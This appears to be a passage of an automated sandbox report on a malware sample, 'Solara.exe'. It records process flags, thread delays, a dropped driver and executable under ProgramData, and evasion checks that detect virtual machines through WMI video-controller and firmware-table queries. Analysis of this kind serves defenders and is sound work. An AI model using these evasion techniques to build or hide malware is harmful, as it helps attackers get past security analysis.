Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599206	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598836	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598405	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Window / User API: threadDelayed 6930	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Window / User API: threadDelayed 461	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Window / User API: threadDelayed 2119	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7032	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2662	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Dropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Solara.exe.bin.exe TID: 1340	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe TID: 4764	Thread sleep count: 6930 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7332	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7460	Thread sleep count: 461 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7460	Thread sleep count: 2119 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599778s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 5032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599326s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599206s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -599016s >= -30000s	Jump to behavior
